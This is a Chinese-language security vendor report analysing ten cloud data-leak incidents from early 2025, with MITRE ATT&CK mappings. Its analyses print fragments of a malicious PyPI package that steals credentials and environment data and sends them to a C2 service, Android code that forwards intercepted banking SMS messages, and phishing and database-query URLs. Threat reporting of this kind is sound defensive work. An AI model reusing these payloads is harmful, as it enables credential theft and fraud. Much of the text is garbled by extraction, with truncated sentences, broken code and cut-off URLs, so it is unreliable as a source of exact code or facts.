【綠盟科技】2025全球云上數(shù)據(jù)泄露風(fēng)險(xiǎn)分析報(bào)告第五期

全球云上數(shù)據(jù)泄露風(fēng)險(xiǎn)分析報(bào)告(第五期)綠盟科技集團(tuán)股份有限公司(以下簡(jiǎn)稱綠盟科技),成立于2000年4月，總部位于北京。公司于2014年1月29日起在深圳證券交易所創(chuàng)業(yè)板上市，證券代碼：300369。綠盟科技在國(guó)內(nèi)設(shè)有40多個(gè)分支提供全線網(wǎng)絡(luò)安全產(chǎn)品、全方位安全解決方案和體系化安全運(yùn)營(yíng)服務(wù)。公司在美國(guó)硅谷、日本東京、英國(guó)倫敦、新加坡設(shè)立海外子公司，深入開(kāi)展全球業(yè)務(wù)，打造全球網(wǎng)絡(luò)安全行業(yè)的中國(guó)品牌。NSFOCUSXINGYUNLAB綠盟科技星云實(shí)驗(yàn)室專注于云計(jì)算安全、云原生安全、解決方案研究與虛擬化網(wǎng)絡(luò)安全問(wèn)題研究?；趌aaS環(huán)境的安全防護(hù)，利用SDN/NFV等新技術(shù)和新理念，提出了軟件定義安全的云安全防護(hù)體系。承擔(dān)并完成多個(gè)國(guó)家、省、市以及行業(yè)重點(diǎn)單位創(chuàng)新研究課題，已成功孵化落地綠盟科技云安全解決方案、綠盟科技云原生安全解決方案。版權(quán)聲明本文中出現(xiàn)的任何文字?jǐn)⑹?、文檔格式、插圖、照片、方法、過(guò)程等內(nèi)容，除另有特別注明，版權(quán)均屬綠盟科技所有，受到有關(guān)產(chǎn)權(quán)及版權(quán)法保護(hù)。任何個(gè)人、機(jī)構(gòu)未經(jīng)綠盟科技的書(shū)面授權(quán)許可，不得以任何方式復(fù)制或引用本文的任何片斷。9事件八.印度尼西亞共和國(guó)銀行使用的微軟云盤Onedrive暴露事件九.爬蟲(chóng)數(shù)據(jù)庫(kù)CommonCrawl中泄露約12000個(gè)DeepSeek相關(guān)憑證事件十.Daytrip使用的Mongo數(shù)據(jù)庫(kù)服務(wù)因錯(cuò)誤配置導(dǎo)致超過(guò)47萬(wàn)用戶旅行數(shù)據(jù)泄露02安全建議2.2針對(duì)系統(tǒng)入侵的安全建議2.3針對(duì)基礎(chǔ)Web應(yīng)用類攻擊的安全建議2.4針對(duì)社工類攻擊的安全建議03總結(jié)04參考文獻(xiàn)前言本報(bào)告為綠盟科技星云實(shí)驗(yàn)室發(fā)布的第五期云上數(shù)據(jù)泄露簡(jiǎn)報(bào)，聚焦2025年1-2月期間的全球云上數(shù)據(jù)泄露事件。鑒于多數(shù)事件成因相似，我們精選了10起典型案例進(jìn)行深入分析，以全面呈現(xiàn)云上數(shù)據(jù)泄露的整體態(tài)勢(shì)。值得注意的是，其中5起事件與大模型技術(shù)密切相關(guān)，凸顯了隨著Deepseek、Ollama等開(kāi)源模型的廣泛應(yīng)用，云上數(shù)據(jù)安全正面臨顯著的“AI驅(qū)動(dòng)型風(fēng)險(xiǎn)”。從事件成因來(lái)看，6起事件源于配置錯(cuò)誤，2起由社工攻擊引發(fā)，1起涉及Web基礎(chǔ)類攻擊，另1起則為系統(tǒng)入侵所致。由此可見(jiàn)，租戶配置錯(cuò)誤仍是導(dǎo)致數(shù)據(jù)全球1-2月云上數(shù)據(jù)泄露典型事件解讀2事件一：Deepseek公司使用的Clickhouse數(shù)據(jù)庫(kù)存在配置錯(cuò)誤導(dǎo)致出現(xiàn)嚴(yán)重聊天數(shù)據(jù)泄露2025年1月29日泄露規(guī)模：百萬(wàn)行的日志流，包含聊天歷史記錄，密鑰等敏感信息Clickhouse服務(wù)，并確定該服務(wù)屬于我國(guó)AI初創(chuàng)公司深度探索(DeepSeek)。Clickhouse能夠?qū)Φ讓拥臄?shù)據(jù)庫(kù)中的數(shù)據(jù)進(jìn)行訪問(wèn)，利用該Clickhouse服務(wù)，Wiz安全研究員發(fā)現(xiàn)了約一百萬(wàn)行DeepSeek的日志流，包含歷史聊天記錄，密鑰等其他敏感信息。發(fā)現(xiàn)問(wèn)題后，Wiz安全研究團(tuán)隊(duì)立即向DeepSeek通報(bào)了這一問(wèn)題，DeepSeek立即對(duì)其暴露的Clickhouse服務(wù)進(jìn)行了安全處置。ClickHouse是一個(gè)開(kāi)源的列式數(shù)據(jù)庫(kù)管理系統(tǒng)(DBMS),專為在線分析處理(OLAP)設(shè)計(jì)。它能夠高效處理大規(guī)模數(shù)據(jù)，支持實(shí)時(shí)查詢和分析，適用于日志分析、用戶行為分析等場(chǎng)景。ClickHouse存在未授權(quán)訪問(wèn)漏洞，對(duì)于一個(gè)未添加任何訪問(wèn)控制機(jī)制的ClickHouse服務(wù)，任意用戶可以通過(guò)該服務(wù)暴露的API接口執(zhí)行類SQL命令。本次事件中，Wiz安全研究團(tuán)隊(duì)通過(guò)技術(shù)手段探測(cè)了約30個(gè)DeepSeek面向互聯(lián)網(wǎng)的子域名的80和443端口。這些暴露服務(wù)大多是托管聊天機(jī)器人界面、狀態(tài)頁(yè)面和API文檔等資源，也都沒(méi)有相關(guān)安全風(fēng)險(xiǎn)。為了進(jìn)一步探尋DeepSeek的暴露風(fēng)險(xiǎn)，Wiz安全研究團(tuán)隊(duì)將探測(cè)范圍擴(kuò)大到了除80、443端口之外的非常規(guī)端口，如8123、9000端口等。最終，他們發(fā)現(xiàn)了非常規(guī)端口的多個(gè)子域名下均有暴露服，如：·http://oauth2callback.deepseek.c·http://oauth2callback.deepseek.c3*NSFOCUS|全球云上數(shù)據(jù)泄露風(fēng)險(xiǎn)分析簡(jiǎn)報(bào)(第五期)在確定這幾個(gè)暴露的服務(wù)為安全研究團(tuán)隊(duì)通過(guò)ClickHouse服務(wù)的API對(duì)底層的數(shù)據(jù)庫(kù)進(jìn)行查詢測(cè)試，包含查詢數(shù)據(jù)庫(kù)、查詢數(shù)據(jù)庫(kù)中的表，如下圖所示：△NotSecure:9000/?View△NotSecure:9000/?query=SHOW%20DATABASESPort9000isforclickhouse-clientprogranYoumustuseport8123forHTTP.DViow十INFORMATIONSCHEMAdefautZoom圖1.疑似Clickhouse泄露數(shù)據(jù)1后圖2.疑似Clickhouse泄露數(shù)據(jù)24從2025年1月6日起，存在泄露風(fēng)險(xiǎn)的日志信息包含對(duì)各種內(nèi)部DeepSeek技術(shù)子技術(shù)利用方式T1590收集受害者網(wǎng)絡(luò)信息.002域名解析攻擊者可能利用主域名對(duì)目標(biāo)進(jìn)行子域名爆破。T1046網(wǎng)絡(luò)服務(wù)發(fā)現(xiàn)N/A攻擊者確定目標(biāo)域名開(kāi)放的端口和服務(wù)。T1106原生接口N/A攻擊者可能利用ClickhouseAPI與數(shù)據(jù)庫(kù)交互。T1567通過(guò)Web服務(wù)外泄N/A攻擊者可能利用ClickhouseAPI進(jìn)行數(shù)據(jù)竊取。database-leak事件二：美國(guó)廣播公司ValleyNews使用的AWSS3對(duì)象存儲(chǔ)存在配置錯(cuò)誤導(dǎo)致大量敏感信息泄露2025年2月4日泄露規(guī)模：超過(guò)180萬(wàn)份文件泄露，其中超過(guò)100萬(wàn)個(gè)是求職者的簡(jiǎn)歷，里面包含姓名、電話號(hào)碼、電子郵箱、家庭住址等個(gè)人敏感信息2025年2月，Cybernews研究團(tuán)隊(duì)發(fā)現(xiàn)美國(guó)廣播公司ValleyNewsLive使用的AmazonAWSS3存儲(chǔ)桶存在配置錯(cuò)誤，導(dǎo)致存儲(chǔ)桶內(nèi)超過(guò)180萬(wàn)份文件存在泄露風(fēng)險(xiǎn)，其中超過(guò)100萬(wàn)個(gè)是求職者的簡(jiǎn)歷，甚至超過(guò)一半的曝光簡(jiǎn)歷跨域多年，時(shí)間跨度從2017年到2024年不等。這些簡(jiǎn)歷中包含了求職者的個(gè)人姓名、電話號(hào)碼、電子郵箱、家庭地址、出生日期、國(guó)籍和出生地、社交媒體鏈接、工作經(jīng)歷和學(xué)歷等個(gè)人敏感信息。這些個(gè)人信息可能會(huì)導(dǎo)致被暴露者的身份存在盜用風(fēng)險(xiǎn)。5 事件分析：AmazonS3是一項(xiàng)面向公有云的對(duì)象存儲(chǔ)服務(wù)，可通過(guò)AmazonS3隨時(shí)在Web上的任何位置存儲(chǔ)和檢索的任意大小的數(shù)據(jù)。其提供了可配置的安全性、數(shù)據(jù)保護(hù)、合規(guī)性和訪問(wèn)控制功能保護(hù)用戶的數(shù)據(jù)安全。如果使用者權(quán)限配置不當(dāng)，對(duì)象存儲(chǔ)服務(wù)中的數(shù)據(jù)將公開(kāi)給所有人訪問(wèn)。導(dǎo)致此次數(shù)據(jù)泄露事件的主要原因是服務(wù)配置錯(cuò)誤。ValleyNewsLive在使用AmazonS3對(duì)象存儲(chǔ)服務(wù)時(shí)沒(méi)有配置安全的訪問(wèn)控制策略，導(dǎo)致任何人均可公開(kāi)訪問(wèn)該對(duì)象存儲(chǔ)服務(wù)。VERIZON事件分類：MiscellaneousErrors(雜項(xiàng)錯(cuò)誤)6所用MITREATT&CK技術(shù)：技術(shù)子技術(shù)利用方式T1593搜索開(kāi)放網(wǎng)站/域.002搜索引擎攻擊者可能利用網(wǎng)絡(luò)空間搜索引擎進(jìn)行情報(bào)收集。T1133外部遠(yuǎn)程服務(wù)N/A攻擊者識(shí)別暴露服務(wù)中的AmazonS3對(duì)象存儲(chǔ)服務(wù)。T1587開(kāi)發(fā)功能.004利用工具攻擊者開(kāi)發(fā)對(duì)AmazonS3對(duì)象存儲(chǔ)服務(wù)進(jìn)行安全測(cè)試的工具。T1530云存儲(chǔ)中的數(shù)據(jù)N/A攻擊者訪問(wèn)AmazonS3對(duì)象存儲(chǔ)服務(wù)的數(shù)據(jù)。T1567通過(guò)Web服務(wù)外泄N/A攻擊者可能利用Web服務(wù)進(jìn)行數(shù)據(jù)竊取。參考鏈接：/security/valley-news-live-data-事件三：攻擊者通過(guò)非法上傳DeepSeek惡意依賴包引泄露規(guī)模：部分用戶憑據(jù)及環(huán)境變量事件回顧：首次上傳兩個(gè)惡意python包(deepseekVamsi2projectsPythonclientforDeepSeekAIAPI-accesslargelanguagemodelsandAlservicesdeepseeekLastdeepseeekLastreleased21minutesagodeepseeekAPIclient7*NSFOCUS|全球云上數(shù)據(jù)泄露風(fēng)險(xiǎn)分析簡(jiǎn)報(bào)(第五期)同日，PositiveTechnologiesExpertSecurityCenter(PTESC)威脅情報(bào)團(tuán)隊(duì)通過(guò)系統(tǒng)捕獲到異?；顒?dòng)同日，PositiveTechnologiesExpertSecurityCenter(PTESC)技術(shù)團(tuán)隊(duì)分析驗(yàn)證并通知PyPI管理員同日，PyPI管理員刪除了以上兩個(gè)惡意python包并通知了PTESC經(jīng)統(tǒng)計(jì)，在惡意python包被上傳后，全球多達(dá)17個(gè)國(guó)家，通過(guò)各種下載渠道共下載惡意軟件高達(dá)200多次，目前兩個(gè)惡意軟件包已被隔離Released:28minutesagoThesedetoilshovebeenverfiedbyBvEIThesedetoilshavenotb。deepseekai,ai,LLM,languageoProvides-Extra:devIntendedAudienceDevelopersThisThisprojecthasbeenquarantined.PyPIAdminsneedtoreviewthisprojectbeforeitcanberestored.Whileinquarantine,theprojectisnotinstallablebyclients,andcannotbebeingmodifiedbyitsmaintainers.Readmoreintheprojectinquarantinehelparticle.DeepSeekAIPythonClientAPythonclientlibraryforinteractingwithDeepSeekAI'sAPIservices.ThispackageprovidessimpleandintuitiveaccesstoDeepSeek'slargelanguagemodelsandAlcapabilities.·Easy-to-useinterfaceforDeepSeekAIAPI·Supportfortextgenerationandcompletion·Built-inerrorhandlingandratelimiting·Comprehensivedocumentationandexamplespippipinstalldeepseekai圖5.被隔離的軟件包事件分析：據(jù)PTESC技術(shù)團(tuán)隊(duì)反饋，惡意用戶上傳的軟件包中主要涉及信息收集和環(huán)境變量竊取等功能，竊取數(shù)據(jù)包括如數(shù)據(jù)庫(kù)憑據(jù)、API、S3對(duì)象存儲(chǔ)訪問(wèn)憑證等。當(dāng)用戶在命令行中運(yùn)行Deepseek或Deepseekai時(shí)，將執(zhí)行惡意載荷。8全球1-2月云上數(shù)據(jù)泄露典型事件解讀33……packages=find_packages(exclude=['ez_setup','examples','tests',·'tests.*',·'release']),uF36...··'consol37.·'deepseekai=deepseekai.main:main',LF11import·requestsLF4#·Suppress·all·warningsLF5warnings.filterwarnings("ignore")LF8·url·=·"LF""LF10……userid·=·os.popen('id').read().strip()·#·Attempt·to·get·user·ID·with·id·commandur12………user_id·=·os.popen('who14·hostname·=·Os.uname().nodename··#·Get·system·hostnameLF15env·=·Os.getenv("ENV","prod")·#·Get·environment·variable·or·default·to·prodLr19….except·requests.exceptions.RequestException:LF20··pass··#·Silently·ignore·any·request·errorSLF圖7.惡意軟件包中的載荷從以上載荷中不難看出攻擊者使用了PipeDream,作為被盜數(shù)據(jù)命令控制服務(wù)器，回顧整個(gè)事件，我們認(rèn)為時(shí)間成因可匯總為以下幾方面：依賴混淆攻擊：利用企業(yè)私有包與公共倉(cāng)庫(kù)同名包優(yōu)先級(jí)差異軟件包命名仿冒策略：模仿知名Al公司Deepseek品牌名稱9PyPI注冊(cè)機(jī)制漏洞：未有效驗(yàn)證開(kāi)發(fā)者身份與包名合法性開(kāi)發(fā)者安全意識(shí)不足：易誤裝名稱相近的惡意包技術(shù)子技術(shù)利用方式T1593搜索公開(kāi)可用的python依賴倉(cāng)庫(kù)，找到PyPIT1195利用惡意軟件包裝為Python依賴，上傳至PyPI倉(cāng)庫(kù)，引發(fā)供應(yīng)鏈攻擊T1059攻擊者在惡意包中植入了惡意代碼，用戶執(zhí)行后便會(huì)泄露環(huán)境變量、憑證等信息，并通過(guò)攻擊者搭建的PipeDream進(jìn)行敏感數(shù)據(jù)外泄T1041N/A通過(guò)C2通道外泄用戶環(huán)境變量、憑證的敏感信息/analytics/pt-esc-threat-intelligence/malicious-packages-deepseeek-and-deepseekai-published-in-python-泄露規(guī)模：約20億大模型Token遭到非法利用2024年5月，Sysdig威脅研究團(tuán)隊(duì)發(fā)現(xiàn)一種針對(duì)大模型的新型網(wǎng)絡(luò)攻擊方式——LLMjacking,又稱LLM劫持攻擊。2024年9月，Sysdig威脅研究團(tuán)隊(duì)表示，LLM劫持攻擊攻擊的頻率和普及正在增加。DeepSeek也逐漸成為被攻擊對(duì)象。2024年12月26日，DeepSeek發(fā)布了高級(jí)模型DeepSeek-V3。幾天后，Sysdig威脅研究團(tuán)隊(duì)發(fā)現(xiàn)DeepSeek-V3已在HuggingFace上托管的OpenAil反向代理(ORP)項(xiàng)目中所實(shí)現(xiàn)。2025年1月20日，DeepSeek發(fā)布了一種稱為DeepSeek-R1的推理模型。次日，支持DeepSeek-R1的ORP項(xiàng)目已經(jīng)出現(xiàn)，多個(gè)ORP已填充了DeepSeekAPI密鑰，并且已有攻擊者開(kāi)始利用這些密鑰。在Sysdig威脅研究團(tuán)隊(duì)的研究工作中，已發(fā)現(xiàn)所有ORP非法利用的大模型Token總數(shù)已超過(guò)20億。LLM劫持攻擊指攻擊者利用竊取的云憑證，針對(duì)云托管的LLM服務(wù)發(fā)起的劫持攻擊。攻擊者利用OAIOAI反向代理和竊取到的云憑證，將受害者訂閱的云托管LLM服務(wù)的訪問(wèn)權(quán)限進(jìn)行出售。該攻擊可能導(dǎo)致受害者承受巨額的云服務(wù)成本。OAI反向代理指LLM服務(wù)的反向代理，OAI反向代理可以幫助攻擊者集中管理對(duì)多個(gè)LLM賬戶的訪問(wèn)，而不暴露底層的憑據(jù)和憑據(jù)池。利用OAIOAI反向代理，攻擊者能夠在沒(méi)有支付相應(yīng)費(fèi)用的情況下運(yùn)行高成本的LLM(如DeepSeek)。攻擊者通過(guò)反向代理訪問(wèn)這些LLM,實(shí)際執(zhí)行任務(wù)和消耗計(jì)算資源，從而繞過(guò)了合法的服務(wù)收費(fèi)。反向代理機(jī)制充當(dāng)了中介角色，重定向請(qǐng)求并隱藏了攻擊者的身份，使其能夠在不被察覺(jué)的情況下濫用云計(jì)算資源。OpenAIOpenAI_GPT_4OAzure-DALL-EUsers'promptsAWS-BedrockGCP-VERTEXAl6OAI-Reverse-ProxyConsumeTokensSsOAI反向代理是實(shí)現(xiàn)LLM劫持攻擊的必要條件，而實(shí)現(xiàn)LLM劫持攻擊的關(guān)鍵是如何竊取到正常用戶所購(gòu)買的各類LLM服務(wù)的憑證、密鑰等。攻擊者對(duì)憑證的竊取往往是通過(guò)傳統(tǒng)的Web服務(wù)漏洞、配置錯(cuò)誤等方式(如Laravel框架的CVE-2021-3129漏洞等)。一旦獲得這些憑證，攻擊者便可以訪問(wèn)云環(huán)境中的LLM服務(wù)，例如AmazonBedrock、GoogleCloudVertexAl等。AWSAWSAWSCreds<cve-2021-1329>Sysdig威脅研究團(tuán)隊(duì)研究表名表明，攻擊者可以在短短幾小時(shí)內(nèi)使受害者的消費(fèi)成本飆升至數(shù)萬(wàn)美元，甚至在某些情況下，日消費(fèi)成本可高達(dá)$100,000。這種攻擊不僅僅是為了獲取數(shù)據(jù)，更多的是為了通過(guò)出售訪問(wèn)權(quán)來(lái)獲取經(jīng)濟(jì)利益。VERIZON事件分類：BasicWebApplicationAttacks(基礎(chǔ)Web應(yīng)用類攻擊)所用MITREATT&CK技術(shù)：技術(shù)子技術(shù)利用方式T1593搜索開(kāi)放網(wǎng)站/域.002搜索引擎攻擊者利用OSINT方法在互聯(lián)網(wǎng)中收集暴露服務(wù)信息。T1133外部遠(yuǎn)程服務(wù)N/A攻擊者識(shí)別暴露服務(wù)中存在漏洞。T1586泄露賬戶.003云賬戶攻擊者利用漏洞竊取LLM服務(wù)或云服務(wù)憑證。T1588獲取能力.002工具攻擊者部署開(kāi)源OAI反向代理工具。T1090代理.002外部代理攻擊者利用OAI反向代理軟件集中管理多個(gè)LLM賬戶的訪問(wèn)。T1496資源劫持N/A攻擊者利用訪問(wèn)LLM注入攻擊進(jìn)行LLM資源劫持。參考鏈接：/blog/llmjacking-targets-deepseek/事件五：大模型集成工具OmniGPT數(shù)據(jù)泄露：超30000用戶數(shù)據(jù)在暗網(wǎng)公開(kāi)售賣泄露規(guī)模：超過(guò)30000名用戶的個(gè)人信息，包括電子郵件、電話號(hào)碼、API密鑰、加密密鑰、憑證及賬單信息等。2025年2月12日，SyntheticEmotions在BreachForums發(fā)布了一篇文章，如圖10所示，攻擊者聲稱自己竊取了OmniGPT平臺(tái)的敏感數(shù)據(jù)，并將其出售。文章中得知，泄露的數(shù)據(jù)包括OmniGPT平臺(tái)上30,000多名用戶的郵件、電話號(hào)碼、API密鑰、加密密鑰、憑證、賬單信息及用戶與聊天機(jī)器人的所有對(duì)話記錄(超過(guò)3400萬(wàn)行)。此外，上傳到平臺(tái)的文件鏈接也被泄露，其中一些文件同樣包含敏感信息，如憑證和賬單資料。盡管此次泄露的具體攻擊路徑未被明確披露，但從泄露的數(shù)據(jù)類型和范圍來(lái)看，攻擊者可能通過(guò)SQL注入、API濫用或社會(huì)工程學(xué)攻擊等手段獲取了后臺(tái)數(shù)據(jù)庫(kù)的訪問(wèn)權(quán)限。當(dāng)然，OmniGPT平臺(tái)也可能存在配置不當(dāng)或漏洞，導(dǎo)致攻擊者能夠繞過(guò)認(rèn)證控制，直接訪問(wèn)包含用戶信息的數(shù)據(jù)庫(kù)。另外，二次泄露的“Messages.txt”文件中包含了API密鑰、數(shù)據(jù)庫(kù)憑證和支付卡信息等，這些信息可能被用于進(jìn)一步入侵其他系統(tǒng)或篡改數(shù)據(jù)。平臺(tái)用戶上傳的部分文件中含有涉及企業(yè)機(jī)密、項(xiàng)目資料等敏感信息，若這些文件被惡意利用，亦可能導(dǎo)致更多業(yè)務(wù)運(yùn)營(yíng)遭受影響。此次泄露事件為整個(gè)行業(yè)敲響了警鐘，提醒所有用戶應(yīng)更加注重?cái)?shù)據(jù)安全和隱私保護(hù)，尤其是在使用AI和大數(shù)據(jù)平臺(tái)時(shí)，應(yīng)制定嚴(yán)格的數(shù)據(jù)使用政策，并對(duì)敏感數(shù)據(jù)進(jìn)行加密、最小化或匿名化處理。否則，一旦發(fā)生類似的數(shù)據(jù)泄露，將可能導(dǎo)致企業(yè)面臨法律、聲譽(yù)和經(jīng)濟(jì)的多重?fù)p失。VERIZON事件分類：MiscellaneousErrors(雜項(xiàng)錯(cuò)誤)技術(shù)子技術(shù)利用方式T1071應(yīng)用層協(xié)議.001HTTP/S攻擊者可能通過(guò)利用OmniGPT的Web接口與被盜數(shù)據(jù)進(jìn)行交互，訪問(wèn)泄露的用戶信息和敏感數(shù)據(jù)。T1071應(yīng)用層協(xié)議.002API接口泄露的API密鑰和數(shù)據(jù)庫(kù)憑證使攻擊者能夠通過(guò)平臺(tái)的API接口進(jìn)一步訪問(wèn)系統(tǒng)，執(zhí)行未經(jīng)授權(quán)的操作。T1071應(yīng)用層協(xié)議.002服務(wù)執(zhí)行攻擊者可能會(huì)濫用系統(tǒng)服務(wù)或守護(hù)程序來(lái)執(zhí)行命令或程序T1020自動(dòng)泄露.003文件傳輸泄露的文件鏈接和用戶上傳的敏感文件可能成為攻擊者訪問(wèn)和下載的目標(biāo)，從中獲取更多敏感數(shù)據(jù)并利用這些數(shù)據(jù)進(jìn)行后續(xù)攻擊。T1083文件和目錄訪問(wèn)001訪問(wèn)敏感文件泄露的文件包含敏感數(shù)據(jù)(如憑證、數(shù)據(jù)庫(kù)信息),攻擊者可能通過(guò)訪問(wèn)這些文件來(lái)進(jìn)一步獲取關(guān)鍵的業(yè)務(wù)信息和用戶數(shù)據(jù)。/blog/omnigpt-leak-risk-ai-data/https://www.CS/article/3822911/hacker-allegedly-puts-massive-omnigpt-breach-data-for-sale-on-the-dark-web.html事件六：印度新型惡意軟件攻擊致50000銀行用戶信息泄露泄露規(guī)模：約50000名用戶的個(gè)人和財(cái)務(wù)敏感信息2025年2月6日，zLabs安全研究團(tuán)隊(duì)發(fā)現(xiàn)包含印度銀行在內(nèi)的多個(gè)用戶遭遇了一場(chǎng)名為“FatBoyPanel”的惡意軟件攻擊。該惡意軟件由約900個(gè)變種組成，旨該惡意軟件活動(dòng)暴露了大約50000名用戶的敏感數(shù)據(jù)，包括來(lái)自印度銀行的短信、銀行詳細(xì)信息、卡詳細(xì)信息和政府頒發(fā)的身份證明詳細(xì)信息。zLabs宣稱，其安全團(tuán)隊(duì)已經(jīng)追蹤并識(shí)別了超過(guò)1000個(gè)與此攻擊活動(dòng)相關(guān)的電話號(hào)碼，這些信息將上報(bào)當(dāng)?shù)貓?zhí)法機(jī)構(gòu)，以追蹤攻擊者。此事件中，攻擊者通過(guò)社交平臺(tái)(WhatsApp)分發(fā)偽裝成銀行應(yīng)用的惡意全球1-2月云上數(shù)據(jù)泄露典型事件解讀APK文件。如圖11所示，該偽裝界面通常與真實(shí)銀行界面非常相似，一旦惡意軟件被安裝，很難以讓普通用戶察覺(jué)到其惡意行為?？蒚THffnFPMKOSANSAMMANNIDHMalwareAttackingUsersofIndianBanksWelcometoPersonalIntermetBanking(CARE:Usemameandpasswordarecasesensitve.)Aφo2φ?qǐng)D11.偽裝的惡意軟件用戶在安裝惡意軟件后，惡意軟件會(huì)請(qǐng)求獲取手機(jī)的短信權(quán)限，攻擊者利用短信權(quán)限攔截并竊取用戶收到的短信，此外，惡意軟件還使用了Firebase和短信轉(zhuǎn)發(fā)技術(shù)來(lái)傳輸竊取的信息，這使得攻擊者能夠?qū)崟r(shí)獲取用戶的驗(yàn)證信息，進(jìn)而實(shí)施資金轉(zhuǎn)賬等非法操作。publicpublicclassReceiveSmsextendsBroadcastReceiver{@Override//android.content.BroadcastReceiverSmsManager.getDefault().sendTextMessage(this.stringNumber,null,s,null,nul}catch(Exceptionexception0){exception0.printStackTrace();publicvoidonReceive(Contextcontext0,Intentintent0){this.androidID=Settings.Secure.getString(context0.getContentResolver(),"android_id");if(intent0.getAction().equals("vider.Telephony.SMS_RECEIVED")){Bundlebundle0=intent0.getExtras();0bject[]arr_object=(Object[])bundle0.get("pdus");SmsMessage[]arrsmsMessage=newSmsMessage[arrobject.length];for(intv=0;V<arrobject.length;++v){SmsMessagesmsMessage0=SmsMessage.createFromPdu(((byte[])arr_object[v]));arrsmsMessage[v]=smsMessage0;smsMessage?.getOriginatingAddress();Strings=arrsmsMessage[v].getMessageBody();this.androidID="";}privateStringstringNumber;StringandroidID;圖12.惡意利用源碼參考VERIZON事件分類：SystemInt技術(shù)子技術(shù)利用方式T1456賬戶利用N/A通過(guò)釣魚(yú)消息分發(fā)惡意APK(Mobile)T1546事件觸發(fā)執(zhí)行.016安裝程序包誘導(dǎo)用戶安裝惡意應(yīng)用-T1656仿冒銀行應(yīng)用T1111多因素身份驗(yàn)證攔截N/A攔截用戶驗(yàn)證短語(yǔ)T1041通過(guò)C2通道進(jìn)行泄漏基于Firebase的Web協(xié)議C2通信，竊取短信和身份信息。/new-malware-attacking-users-of-事件七：攻擊者通過(guò)設(shè)備代碼身份驗(yàn)證入侵Microsoft3652025年2月17日泄露規(guī)模：未明確具體數(shù)量，描述為"多組織受害",泄露內(nèi)容包括Microsoft3652025年1月初：Volexity發(fā)現(xiàn)多個(gè)俄羅斯威脅團(tuán)隊(duì)利用設(shè)備驗(yàn)證碼發(fā)起針對(duì)Microsoft365的社工攻擊。2025年1月中旬：確認(rèn)攻擊團(tuán)隊(duì)包括Cozylarch(APT29關(guān)聯(lián))、UTA0304和UTA0307,鎖定其目標(biāo)為劫持Microsoft365賬戶。2025年2月底：攻擊者仿冒美國(guó)國(guó)務(wù)院、烏克蘭國(guó)防部等機(jī)構(gòu)官員身份，通過(guò)釣魚(yú)郵件誘導(dǎo)受害者訪問(wèn)偽造URL。受害者被引導(dǎo)至偽裝成"微軟團(tuán)隊(duì)會(huì)議"或"安全聊天室"的釣魚(yú)頁(yè)面，輸入設(shè)備驗(yàn)證碼后觸發(fā)賬戶認(rèn)證。2025年2月17日至今：攻擊者持續(xù)通過(guò)竊取的Token橫向滲透至OneDrive全球1-2月云上數(shù)據(jù)泄露典型事件解讀等關(guān)聯(lián)服務(wù)，事件仍在調(diào)查中。事件分析：Microsoft365是微軟的云端辦公室方案，包括免費(fèi)的線上OfficeOnline、線上會(huì)議MicrosoftTeams、管理信件的OutlookWebApp、建立小組溝通網(wǎng)站的SharePointOnline等。據(jù)Volexity的安全研究人員透露，此次攻擊事件的攻擊路徑如下所示：generateDeviceCodeThreatActor-SendsSends>*******Accessgraph.microso(downloadingfiles,emails)forarbitraryinteractionwithAccessgraph.microso(downloadingfiles,emails)圖13.事件攻擊路徑圖攻擊者首先向Microsoft365發(fā)起合法請(qǐng)求，生成有效的設(shè)備驗(yàn)證碼(DeviceCode)。該驗(yàn)證碼默認(rèn)有效期為15分鐘，攻擊者需在此窗口期內(nèi)完成后續(xù)攻擊操作。*NSFOCUS|全球云上數(shù)據(jù)泄露風(fēng)險(xiǎn)分析簡(jiǎn)報(bào)(第五期)釣魚(yú)誘導(dǎo)階段基于前期對(duì)目標(biāo)的信息收集(如郵箱、社交畫像),攻擊者將生成的DeviceCode嵌入釣魚(yú)郵件中，偽裝成"加入微軟團(tuán)隊(duì)會(huì)議"或"進(jìn)入安全聊天室"等誘導(dǎo)性話術(shù)。JointhemeetingFororganizers:Meetingoptions圖14.釣魚(yú)郵件內(nèi)容郵件內(nèi)設(shè)置"JointheMeeting"等高仿按鈕，點(diǎn)擊后跳轉(zhuǎn)至攻擊者架設(shè)設(shè)置的偽造微軟認(rèn)證頁(yè)面(示意圖如下)。SecuritycheckSecuritycheck08https//connect-71qpages.dev/ink?t=MicrosoftTeams&l=dGVhbXMu☆MicrosoftGothroughaquickcheck.Copythecodebelowandenteritonthenextstep.圖注15.攻擊者偽造的微軟安全檢查頁(yè)面全球1-2月云上數(shù)據(jù)泄露典型事件解讀交互驗(yàn)證劫持階段動(dòng)態(tài)DeviceCode機(jī)制：偽造頁(yè)面具備動(dòng)態(tài)生成新DeviceCode的能力，確保每次訪問(wèn)時(shí)提供有效驗(yàn)證碼(與第一步生成的初始DeviceCode形成獨(dú)立鏈路)。雙重頁(yè)面誘導(dǎo)：受害者點(diǎn)擊"Next"后，系統(tǒng)自動(dòng)開(kāi)啟新瀏覽器標(biāo)簽頁(yè)加載真實(shí)微軟設(shè)備認(rèn)證頁(yè)面(如/devicelogin),同時(shí)偽造頁(yè)面通過(guò)腳本保持前臺(tái)顯示以維持交互連續(xù)性。認(rèn)證緩存利用：受害者受誘導(dǎo)在真實(shí)驗(yàn)證頁(yè)面輸入偽造頁(yè)面提供的DeviceCode時(shí)，其本地瀏覽器緩存的微軟憑證可能觸發(fā)自動(dòng)授權(quán)，導(dǎo)致攻擊者實(shí)時(shí)獲取微軟OAuth令牌(Token)。權(quán)限濫用與橫向滲透階段攻擊者利用竊取的Token,通過(guò)MicrosoftGraphAPI或其他接口訪問(wèn)受害者M(jìn)icrosoft365賬戶數(shù)據(jù)(郵件、OneDrive文件等)。為擴(kuò)大攻擊面，進(jìn)一步利用賬戶權(quán)限進(jìn)行橫向移動(dòng)，例如：訪問(wèn)關(guān)聯(lián)的云存儲(chǔ)服務(wù)(如OneDrive、SharePoint)劫持企業(yè)內(nèi)部協(xié)作權(quán)限(Teams會(huì)議、共享文檔)通過(guò)郵箱權(quán)限發(fā)起次級(jí)釣魚(yú)攻擊(APT滲透)該事件涉及的loCResolutionforknownUTA0304indicatorResolutionforknownUTA0304indicatorhostnameSuspectedUTA0304hostnameSuspectedUTA0304hostnameUTA0304hostnameUTA0304hostnameSuspectedUTA0304hostnamehostnameDomainusedinUTA0307phishing圖16.事件涉及PoC所用MITREATT&CK技術(shù)：技術(shù)子技術(shù)利用方式T1593搜索開(kāi)放網(wǎng)站/域.002搜索引擎攻擊者可能利用OSINT方法進(jìn)行情報(bào)收集。T1566網(wǎng)絡(luò)釣魚(yú).002魚(yú)叉是網(wǎng)絡(luò)釣魚(yú)鏈接攻擊者通過